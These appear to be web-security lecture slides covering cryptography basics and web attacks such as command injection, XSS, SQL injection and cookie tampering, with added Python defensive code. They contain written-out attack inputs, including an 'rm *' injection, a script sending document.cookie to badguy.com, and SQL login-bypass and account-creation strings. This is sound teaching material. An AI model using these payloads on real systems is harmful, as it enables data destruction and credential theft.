Games and the Impossibility of Realizable Ideal Functionality


CS6320 – Web Security
L. Grewe
Modified from http://crypto.stanford.edu/cs155/
Issues

• Authentication, authorization
• Protecting your system against hackers
• Controlling access to critical data
• Controlling inbound versus outbound traffic
• Security versus accessibility tradeoffs
• Security versus capability tradeoffs
• Multi-tier versus single-tier solutions
• Security versus expense tradeoffs
• Security and capability versus administrative overhead and complexity
Solutions

• Software-based
• Hardware-based
• Freeware versus commercial products
• Use of security protocols
• Cryptography: converting messages to unreadable forms ... and back
• Steganography: hiding the existence of a message
One issue ... buffer overflow ... things getting better

Majority of vulnerabilities now found in web software.

[Chart: number of reported vulnerabilities per year, 2001 to 2006, "Web (XSS)" versus "Buffer Overflow"; y-axis 0 to 25. Source: MITRE CVE trends]
Example Web Site architecture w/ Security Components

[Diagram: a load balancer in front of web servers WS1, WS2, WS3; two firewalls; an Application Firewall (WAF); app servers; DB; an Intrusion Detection System; an Authorization component.]
Attacks of systems

Common web-site attacks:
• Denial of Service
• Attack the web server (IIS, Apache), e.g. control hijacking: CodeRed, Nimda, ...

Solutions:
• Harden web server: stackguard, libsafe, ...
• Worm defense: host based intrusion detection, worm signature generation, shields.
Firewalls

• A system designed to prevent unauthorized access to or from a private network. Firewalls can be implemented in hardware, in software, or a combination of both.
• IP filtering (packet filtering) = controls access by solely looking at information contained in the IP header of data packets being sent to the server.
• Proxy servers / application firewalls
Web Application Firewalls

• Prevent some attacks such as:
  • SQL injection
  • Form field tampering
  • Cookie poisoning
• Some examples: Imperva, Kavado Interdo, F5 TrafficShield, Citrix NetScaler, CheckPoint Web Intelligence
Message/Information Hiding

• Protect some information being sent from client to server and vice versa.
• Through encryption.
• Some protocols such as SSL (Secure Sockets Layer) use encryption to perform a "secure" exchange of information.
Encryption

Convert normal, readable data into obscured, unreadable data:
  "Hi There!!"  ->  Encryption Algorithm  ->  "m/okuGlilkdskuch"
  "Hi There!!"  ->  Encryption Algorithm  ->  "alieka;wk12938*"
Decryption

Convert obscured, unreadable data into normal, readable data:
  "m/okuGlilkdskuch"  ->  Decryption Algorithm  ->  "Hi There!!"
  "alieka;wk12938*"   ->  Decryption Algorithm  ->  "Hi There!!"
Terminology

• plaintext - clear readable text
• ciphertext - unreadable text
• cipher - algorithm(s) for encryption and decryption

  "Hi There!!" (plaintext)       ->  Encryption Algorithm  ->  "alieka;wk12938*" (ciphertext)
  "alieka;wk12938*" (ciphertext) ->  Decryption Algorithm  ->  "Hi There!!" (plaintext)
Terminology

• Key -- a secret piece of information that controls how the encryption algorithm works
• Different keys produce different encrypted results:
  Key "Citizen Kane":  "Hi There!!"  ->  Encryption Algorithm  ->  "109291ala;dfwij?"
  Key "Citizen Kano":  "Hi There!!"  ->  Encryption Algorithm  ->  "398jfasd;k2//ad?"
Symmetric Key Technology

• Alice wants to send a private/confidential message to Bob
• Alice computes c = crypt(message, key)
• Sends c to Bob over unsecured wire
• Bob computes message = crypt(c, key)
Symmetric Key Application

• Password login
• Alice sends password to computer to prove identity (authenticity)
• Problem: sniffing
• Solution: challenge/response
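The challenge/response idea from the slide, as an added example (not from the original slides): the server sends a fresh random nonce, Alice answers with an HMAC of that nonce under the shared key, and the key itself never crosses the wire. The shared key value and the function names are constructed for this demo; a real system would hold a per-user key derived from the password rather than the password itself.

```python
import hmac
import hashlib
import secrets

# Constructed shared secret for the demo (stands in for the key the server holds for Alice).
SHARED_KEY = b"constructed-shared-secret-for-alice"


def make_challenge() -> bytes:
    """Server side: a fresh, unpredictable nonce for every login attempt."""
    return secrets.token_bytes(16)


def respond(key: bytes, challenge: bytes) -> str:
    """Client side (Alice): prove knowledge of the key without sending it.
    Only the HMAC tag goes over the unsecured wire."""
    return hmac.new(key, challenge, hashlib.sha256).hexdigest()


def verify(key: bytes, challenge: bytes, response: str) -> bool:
    """Server side: recompute the expected tag and compare in constant time."""
    return hmac.compare_digest(respond(key, challenge), response)


def replay_succeeds(key: bytes, sniffed_response: str) -> bool:
    """What a sniffer gains: replaying a captured response against a NEW login.
    The server issues a new challenge, so the old tag no longer matches."""
    new_challenge = make_challenge()
    return verify(key, new_challenge, sniffed_response)


def login_round_trip(key: bytes) -> bool:
    """One honest login: server challenges, Alice responds, server verifies."""
    challenge = make_challenge()
    return verify(key, challenge, respond(key, challenge))


if __name__ == "__main__":
    print("honest login ok:", login_round_trip(SHARED_KEY))
    c = make_challenge()
    r = respond(SHARED_KEY, c)
    print("replay of sniffed response ok:", replay_succeeds(SHARED_KEY, r))
```

Compared with sending the password, a sniffer who captures (challenge, response) learns a tag that is only valid for that one nonce; guessing the key from the tag is an HMAC-SHA256 preimage problem, not a lookup.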
Shared Secret Key

• Shared secret is great ... but how do we distribute it?
Asymmetric Key Cryptography

• Instead of one key, have two:
  • public key
  • private key
• Public key known to everyone and a private or secret key known only to the recipient of the message.
• When John wants to send a secure message to Jane, he uses Jane's public key to encrypt the message. Jane then uses her private key to decrypt it.
• Computing the private key from the public key is very, very difficult (factoring a huge number).
Asymmetric Encryption Example

• John: finds Jane.pub (public key) from her website (or she gives it in an email to John)
• John: computes c = crypt(message, Jane.pub)
• John: sends c to Jane over unsecured wire
• Jane: computes message = crypt(c, Jane.priv)
Advantages

• Key distribution not a problem!
• Anyone can send a message to Jane
• Only Jane can decrypt!
Asymmetric Encryption for Authentication

• Alice wants to tell Bob the message is really from her!
• Digital signature
• Alice computes c = crypt(message, Alice.priv)
• Alice sends c over unsecured wire
• Anyone can check that Alice is the sender ... by computing message = crypt(c, Alice.pub)
Authenticity + Secrecy

[Diagram, built up over six slides: Alice holds A.priv and the public keys A.pub, B.pub, ...; Bob holds B.priv; Carl & Eve ("Bad People!") watch the wire. Alice's message "I LUV U" is protected with B.pub so only Bob can read it (secrecy), and the note "This is from A" is produced with A.priv so Bob can check it came from Alice (authenticity).]
Another Solution: Digital Certificates

• Certificate Authority: publishes that a particular identity goes with a particular public key
• Alice gets a certificate (identity <=> public key), signed by the CA
• So if you trust the CA, then you can trust the public key
SSL ... the idea

• Jane connects to John's server
• John's server returns certificate (signed by VeriSign), plus something encrypted w/ John.priv
• Jane can verify certificate is valid
• Uses public key to decrypt token
• John authenticated
• Jane makes one time session key k
• Encrypts w/ John's public key, sends to John
• Now, can use symmetric key cryptography
Attacks ...

• There are many kinds of attacks that hackers have done
• Will mention some more weaknesses here ... but take a class on security, cryptography, etc. to get into more details.
Attack: Denial of Service

• Make the service unavailable
• Flood of incoming traffic
• Use robot to launch DoS on server.
• Hard to trace identity of attacker.
• Distributed DoS (DDoS)
  • Take over many machines, launch attack simultaneously from many locations
Attack: Buffer Overflow

• Bad guy sends a huge, over-sized request to a naïvely implemented (aka buggy) program, overflowing the input buffer
• May overwrite data in memory (and/or) program code
• May overwrite the return address on the stack of a program in C, so that the procedure call returns somewhere else
How To Avoid Buffer Overflow

• Write code carefully
• Limit input size; read in small chunks as opposed to reading in whole input
• Use better languages (e.g. Java)
Another Problem >>>>> What about all of the web application code???

• Runs on web server or app server.
  • Takes input from web users (via web server)
  • Interacts with the database and 3rd parties.
  • Prepares results for users (via web server)
• Examples:
  • Shopping carts, home banking, bill pay, tax prep, ...
  • New code written for every web site.
• Written in:
  • C, PHP, Perl, Python, JSP, ASP, ...
  • Often written with little consideration for security.
Web Application problems

• Inadequate validation of user input
  • Cross site scripting
  • SQL injection
  • HTTP splitting
• Broken session management
  • Can lead to session hijacking and data theft
• Insecure storage
  • Sensitive data stored in the clear.
  • Prime target for theft – e.g. egghead, Verizon.
  • Note: PCI Data Security Standard (Visa, Mastercard)
A simple example

Direct use of user input:
  http://victim.com/copy.php?name=username
  (copy.php is the script name, name=username is the script input)

copy.php:
  system("cp temp.dat $name.dat")

Problem:
  http://victim.com/copy.php?name="a ; rm *"
  (should be: name=a%20;%20rm%20* )
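The copy.php problem above in Python, as an added example that is not part of the original slides: the vulnerable pattern builds one command line string that the shell re-tokenizes, so the `;` becomes a statement separator. The hardened version allowlists the name and hands the process an argv list with no shell at all. The `SAFE_NAME` pattern, file name `temp.dat` and function names are constructed for this demo.

```python
import re
import shlex
import subprocess

# Constructed allowlist: letters, digits, '-' and '_' only, at most 32 characters.
# A name that a legitimate user could own never needs ';', '*', '/' or whitespace.
SAFE_NAME = re.compile(r"^[A-Za-z0-9_-]{1,32}$")


def vulnerable_command(name: str) -> str:
    """The copy.php pattern from the slide: untrusted input pasted into a shell command line.
    Returned as a string only so it can be inspected; it is never executed here."""
    return f"cp temp.dat {name}.dat"


def shell_words(command: str) -> list:
    """Tokenize the way a POSIX shell would, to show what the injected input turns into."""
    return shlex.split(command)


def validate_name(name: str) -> str:
    """Reject anything outside the allowlist before it reaches a command."""
    if not SAFE_NAME.fullmatch(name):
        raise ValueError(f"rejected unsafe name: {name!r}")
    return name


def build_copy_command(name: str) -> list:
    """Hardened form: validated input, passed as a separate argv element, no shell."""
    return ["cp", "temp.dat", f"{validate_name(name)}.dat"]


def copy_for_user(name: str) -> subprocess.CompletedProcess:
    """Run the hardened command; shell=False means ';' could never be a separator."""
    return subprocess.run(build_copy_command(name), shell=False, check=True)


if __name__ == "__main__":
    print(shell_words(vulnerable_command("a ; rm *")))   # the shell sees 'rm' as a second command
    print(build_copy_command("report1"))
    try:
        build_copy_command("a ; rm *")
    except ValueError as e:
        print("blocked:", e)
```

Note that escaping (`shlex.quote`) alone would also defeat this particular input, but the argv-list form removes the shell from the picture entirely, so there is no quoting logic to get wrong.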
Redirects

EZShopper.com shopping cart (10/2004):
  http://.../cgi-bin/loadpage.cgi?page=url
• Redirects browser to url

Redirects are common on many sites
• Used to track when user clicks on external link
• EZShopper uses redirect to add HTTP headers

Problem: phishing
  http://victim.com/cgi-bin/loadpage?page=phisher.com
• Link to victim.com puts user at phisher.com

Local redirects should ensure target URL is local
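One way to implement the "target URL must be local" check from the slide, as an added example (not code from the original slides or from EZShopper). It accepts only site-absolute paths and resolves the target against the site's own origin, which also catches the cases a naive "starts with /" test misses: scheme-relative `//host`, backslash variants browsers treat as slashes, and non-http schemes. The `victim.com` origin and the function names are constructed for this demo.

```python
from urllib.parse import urljoin, urlparse

# Constructed origin of the site issuing the redirect.
SITE_ORIGIN = "http://victim.com"


def is_local_redirect(target: str, site_origin: str = SITE_ORIGIN) -> bool:
    """True only if `target` is a path on this site.

    Policy: the target must be a site-absolute path ('/...'). Anything with a
    scheme ('http:', 'javascript:'), a host ('//phisher.com'), or control
    characters is rejected. Backslashes are folded to slashes first because
    browsers do the same for http URLs, so '/\\phisher.com' would otherwise
    become a scheme-relative URL pointing off-site."""
    if not target or any(ord(ch) < 0x21 for ch in target):
        return False
    normalized = target.replace("\\", "/")
    if not normalized.startswith("/") or normalized.startswith("//"):
        return False
    resolved = urlparse(urljoin(site_origin + "/", normalized))
    site = urlparse(site_origin)
    return resolved.scheme == site.scheme and resolved.netloc == site.netloc


def safe_redirect_target(target: str, fallback: str = "/") -> str:
    """What loadpage.cgi should send in its Location header: the requested
    path if it is local, otherwise a harmless fallback on the same site."""
    return target if is_local_redirect(target) else fallback


if __name__ == "__main__":
    for candidate in ["/account/orders", "//phisher.com", "http://phisher.com",
                      "/\\phisher.com", "javascript:alert(1)", "phisher.com"]:
        print(f"{candidate!r:28} -> {safe_redirect_target(candidate)}")
```

Note that a bare host name such as `phisher.com` is also rejected: the check deliberately refuses anything that is not an explicit path, rather than trying to guess whether the server would prepend a scheme to it.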
Cross Site Scripting (XSS)
The setup

• User input is echoed into HTML response.
• Example: search field
  • http://victim.com/search.php?term=apple
  • search.php responds with:

<HTML>
<TITLE> Search Results </TITLE>
<BODY>
Results for <?php echo $_GET['term'] ?> :
. . .
</BODY>
</HTML>

• Is this exploitable?
Answer ..... Bad input

• Problem: no validation of input term
• Consider link (properly URL encoded):
  http://victim.com/search.php?term=<script> window.open("http://badguy.com?cookie=" + document.cookie) </script>
• What if user clicks on this link?
  1. Browser goes to victim.com/search.php
  2. victim.com returns <HTML> Results for <script> ... </script>
  3. Browser executes script: sends badguy.com cookie for victim.com
What is the problem?

• Why would user click on such a link?
  • Phishing email in webmail client (e.g. gmail).
  • Link in doubleclick banner ad
  • ... many many ways to fool user into clicking
• What if badguy.com gets cookie for victim.com?
  • Cookie can include session auth for victim.com
  • Or other data intended only for victim.com
  • Violates same origin policy
Worse ...

• Attacker can execute arbitrary scripts in browser
• Can manipulate any DOM component on victim.com
  • Control links on page
  • Control form fields (e.g. password field) on this page and linked pages.
  • Example: inject password field that sends password to bad guy.
• Can infect other users: MySpace.com worm.
MySpace.com (Samy worm)

• Users can post HTML on their pages
  • MySpace.com ensures HTML contains no <script>, <body>, onclick, <a href=javascript://>
  • ... but can do Javascript within CSS tags:
    <div style="background:url('javascript:alert(1)')">
  • And can hide "javascript" as "java\nscript"
• With careful javascript hacking:
  • Samy's worm: infects anyone who visits an infected MySpace page ... and adds Samy as a friend.
  • Samy had millions of friends within 24 hours.
• More info: http://namb.la/popular/tech.html
Avoiding XSS bugs (PHP)

• Main problem: input checking is difficult --- many ways to inject scripts into HTML.
• Preprocess input from user before echoing it
• PHP: htmlspecialchars(string)
  &  ->  &amp;
  "  ->  &quot;
  <  ->  &lt;
  >  ->  &gt;
  '  ->  &#039;
• htmlspecialchars("<a href='test'>Test</a>", ENT_QUOTES);
  Outputs: &lt;a href=&#039;test&#039;&gt;Test&lt;/a&gt;
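The search.php setup and the htmlspecialchars fix, together in Python as an added example that is not from the original slides. `htmlspecialchars` below reproduces PHP's ENT_QUOTES table from the slide (including `&#039;` for the single quote, which differs from Python's own `html.escape`), and `render_search_page` shows the page in both the vulnerable and the escaped form. The link builder, page template and function names are constructed for this demo.

```python
import urllib.parse

# Replacement table from the slide (PHP htmlspecialchars with ENT_QUOTES).
# '&' must be first so that entities produced by later rules are not escaped twice.
HTML_ESCAPES = [
    ("&", "&amp;"),
    ('"', "&quot;"),
    ("<", "&lt;"),
    (">", "&gt;"),
    ("'", "&#039;"),
]


def htmlspecialchars(text: str) -> str:
    """Python equivalent of PHP htmlspecialchars($s, ENT_QUOTES)."""
    for raw, entity in HTML_ESCAPES:
        text = text.replace(raw, entity)
    return text


def term_from_query(url: str) -> str:
    """What search.php reads from $_GET['term']: the URL-decoded query value."""
    query = urllib.parse.urlparse(url).query
    return urllib.parse.parse_qs(query).get("term", [""])[0]


def render_search_page(term: str, escape: bool = True) -> str:
    """Mimics search.php. escape=False is the slide's vulnerable echo;
    escape=True preprocesses the term before echoing it."""
    shown = htmlspecialchars(term) if escape else term
    return (
        "<HTML>\n<TITLE> Search Results </TITLE>\n<BODY>\n"
        f"Results for {shown} :\n. . .\n</BODY>\n</HTML>"
    )


def contains_script_tag(html: str) -> bool:
    """Crude check used only to show whether a live <script> element survived."""
    return "<script" in html.lower()


def slide_attack_link() -> str:
    """The slide's malicious link, properly URL encoded (constructed here)."""
    payload = '<script> window.open("http://badguy.com?cookie=" + document.cookie) </script>'
    return "http://victim.com/search.php?" + urllib.parse.urlencode({"term": payload})


if __name__ == "__main__":
    print(htmlspecialchars("<a href='test'>Test</a>"))
    term = term_from_query(slide_attack_link())
    print("unescaped page runs script:", contains_script_tag(render_search_page(term, escape=False)))
    print("escaped page runs script:  ", contains_script_tag(render_search_page(term)))
```

Escaping here is output encoding for an HTML text context; the same term placed inside a `<script>` block or an unquoted attribute would need a different encoder, which is the "many ways to inject" point the slide makes.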
httpOnly Cookies

[Diagram: Browser (IE) sends GET ...; Server replies with HTTP header Set-Cookie: NAME=VALUE; HttpOnly]

• Cookie sent over HTTP(S), but not accessible to scripts
• Cannot be read via document.cookie
• Helps prevent cookie theft via XSS
• ... but does not stop most other risks of XSS bugs.
SQL Injection
The setup

• User input is used in SQL query
• Example: login page (in ASP)

set ok = execute("SELECT * FROM UserTable WHERE username=' " & form("user") & " ' AND password=' " & form("pwd") & " ' ");
If not ok.EOF
    login success
else fail;

• Is this a problem?
The problem ..... Bad input

• Suppose user = " ' or 1 = 1 -- " (URL encoded)
• Then script does:
  ok = execute( SELECT ... WHERE username= ' ' or 1=1 -- ... )
  • The "--" causes rest of line to be ignored.
  • Now ok.EOF is always false.
• The bad news: easy login to many sites this way.
Worse ...

• Suppose user = ' exec cmdshell 'net user badguy badpwd' / ADD --
• Then script does:
  ok = execute( SELECT ... WHERE username= ' ' exec ... )
• If SQL server context runs as "sa", attacker gets account on DB server.
Avoiding SQL injection

• Build SQL queries by properly escaping args: '  ->  \'
• Example: Parameterized SQL (ASP.NET 1.1)
  • Ensures SQL arguments are properly escaped.

SqlCommand cmd = new SqlCommand(
    "SELECT * FROM UserTable WHERE username = @User AND password = @Pwd",
    dbConnection);
cmd.Parameters.Add("@User", Request["user"]);
cmd.Parameters.Add("@Pwd", Request["pwd"]);
cmd.ExecuteReader();

• In PHP: bound parameters -- similar function
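The login query from the setup slide and the parameterized fix, run side by side in Python against an in-memory SQLite database, as an added example (not code from the original slides). `login_vulnerable` concatenates the way the ASP snippet does; `login_parameterized` uses bound parameters, the PHP/ASP.NET approach the slide recommends. The table contents, the `' or 1 = 1 --` input and the function names are constructed for this demo.

```python
import sqlite3


def make_db() -> sqlite3.Connection:
    """Constructed UserTable with one account, mirroring the slide's schema."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE UserTable (username TEXT, password TEXT)")
    conn.execute("INSERT INTO UserTable VALUES ('alice', 'correct horse')")
    conn.commit()
    return conn


def vulnerable_query_text(user: str, pwd: str) -> str:
    """Exactly what the concatenating ASP code hands to the database."""
    return ("SELECT * FROM UserTable WHERE username='" + user
            + "' AND password='" + pwd + "'")


def login_vulnerable(conn: sqlite3.Connection, user: str, pwd: str) -> bool:
    """The slide's pattern: input spliced into the statement text.
    With user = "' or 1 = 1 --", the rest of the WHERE clause is commented out."""
    row = conn.execute(vulnerable_query_text(user, pwd)).fetchone()
    return row is not None          # "If not ok.EOF then login success"


def login_parameterized(conn: sqlite3.Connection, user: str, pwd: str) -> bool:
    """Bound parameters: the driver sends the values separately from the SQL,
    so quotes and '--' inside them are data, never syntax."""
    sql = "SELECT * FROM UserTable WHERE username=? AND password=?"
    row = conn.execute(sql, (user, pwd)).fetchone()
    return row is not None


if __name__ == "__main__":
    db = make_db()
    bad_user = "' or 1 = 1 --"
    print(vulnerable_query_text(bad_user, "anything"))
    print("vulnerable login with bad input:    ", login_vulnerable(db, bad_user, "anything"))
    print("parameterized login with bad input: ", login_parameterized(db, bad_user, "anything"))
    print("parameterized login, real password: ", login_parameterized(db, "alice", "correct horse"))
```

The parameterized version is not an escaping routine that happens to be correct; the database never parses the user's text as SQL at all, which is why it also holds up against the `exec` payload from the "Worse" slide.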
App code

• Little programming knowledge can be dangerous:
  • Cross site scripting
  • SQL injection
  • HTTP splitting
• What to do?
  • Band-aid: Web App Firewall (WAF)
    • Looks for attack patterns and blocks requests
    • False positives / false negatives
  • Code checking
Code checking

• Blackbox security testing services:
  • Whitehatsec.com
• Automated blackbox testing tools:
  • Cenzic, Hailstorm
  • SPI Dynamics, WebInspect
  • eEye, Retina
• Web application hardening tools:
  • WebSSARI [WWW'04]: based on information flow
  • Nguyen-Tuong [IFIP'05]: based on tainting
Session Management

Cookies, hidden fields, and user authentication
Cookie risks

• Danger of storing data on browser
  • User can change values
• Silly example: shopping cart software.
  Set-cookie: shopping-cart-total = 150 ($)
  • User edits cookie file (cookie poisoning):
    Cookie: shopping-cart-total = 15 ($)
  • ... bargain shopping.
• Similar behavior with hidden fields:
  <INPUT TYPE="hidden" NAME=price VALUE="150">
Not so silly ... some real sites had this issue

• D3.COM Pty Ltd: ShopFactory 5.8
• @Retail Corporation: @Retail
• Adgrafix: Check It Out
• Baron Consulting Group: WebSite Tool
• ComCity Corporation: SalesCart
• Crested Butte Software: EasyCart
• Dansie.net: Dansie Shopping Cart
• Intelligent Vending Systems: Intellivend
• Make-a-Store: Make-a-Store OrderPage
• McMurtrey/Whitaker & Associates: Cart32 3.0
• [email protected]: CartMan 1.04
• Rich Media Technologies: JustAddCommerce 5.0
• SmartCart: SmartCart
• Web Express: Shoptron 1.2
Solution

• When storing state on browser, MAC the data using a server secret key.
• .NET 2.0:
  • System.Web.Configuration.MachineKey
    • Secret web server key intended for cookie protection
  • HttpCookie cookie = new HttpCookie(name, val);
    HttpCookie encodedCookie = HttpSecureCookie.Encode(cookie);
  • HttpSecureCookie.Decode(cookie);
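The "MAC data using server secret key" solution applied to the shopping-cart cookie from the previous slides, as an added example (not the .NET HttpSecureCookie code or anything from the original slides). The server appends an HMAC-SHA256 tag under a key the browser never sees; an edited value no longer matches its tag, and a forger without the key cannot make a new one. The key value, the tag encoding and the function names are constructed for this demo; the `Set-Cookie` helper also adds the HttpOnly attribute from the earlier slide.

```python
import base64
import hashlib
import hmac

# Constructed server-side secret (the role MachineKey plays in .NET). Never sent to the browser.
SERVER_KEY = b"constructed-server-cookie-key"


def _tag(value: str, key: bytes) -> str:
    digest = hmac.new(key, value.encode("utf-8"), hashlib.sha256).digest()
    return base64.urlsafe_b64encode(digest).decode("ascii").rstrip("=")


def encode_cookie(value: str, key: bytes = SERVER_KEY) -> str:
    """Cookie body = value '.' HMAC(key, value). The value stays readable;
    the tag makes it tamper-evident, not secret."""
    return value + "." + _tag(value, key)


def decode_cookie(cookie: str, key: bytes = SERVER_KEY):
    """Return the protected value, or None if the cookie is malformed,
    edited, or was signed with a different key."""
    value, sep, _ = cookie.rpartition(".")
    if not sep:
        return None
    expected = encode_cookie(value, key)
    if not hmac.compare_digest(expected.encode("ascii"), cookie.encode("utf-8")):
        return None
    return value


def set_cookie_header(name: str, value: str, key: bytes = SERVER_KEY) -> str:
    """Header the server sends; HttpOnly keeps document.cookie from reading it."""
    return f"Set-Cookie: {name}={encode_cookie(value, key)}; HttpOnly"


if __name__ == "__main__":
    header = set_cookie_header("shopping-cart-total", "150")
    print(header)
    cookie = header.split("=", 1)[1].split(";")[0]
    print("server reads back:", decode_cookie(cookie))
    edited = "15." + cookie.split(".", 1)[1]          # the cookie-poisoning edit from the slide
    print("edited cookie accepted?", decode_cookie(edited) is not None)
```

The tag is checked with a constant-time comparison and computed with a full-strength MAC, which is the property the "weak MAC exposes k from few cookies" slide says the WSJ.com scheme lacked.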
Cookie authentication

[Diagram: Browser -> Web Server: POST login.cgi with username & pwd; Web Server -> Auth server: validate user; Auth server stores val and returns auth=val; Web Server -> Browser: Set-cookie: auth=val. Later: Browser -> Web Server: GET restricted.html with Cookie: auth=val; Web Server -> Auth server: check val; Auth server answers YES/NO; if YES, Web Server returns restricted.html.]
Weak authenticators: security risk

• Predictable cookie authenticator
  • Verizon Wireless - counter
  • Valid user logs in, gets counter, can view sessions of other users.
• Weak authenticator generation [Fu et al. '01]
  • WSJ.com: cookie = {user, MAC_k(user)}
  • Weak MAC exposes k from few cookies.
• Apache Tomcat: generateSessionID()
  • MD5(PRNG) ... but weak PRNG [GM'05].
  • Predictable SessionIDs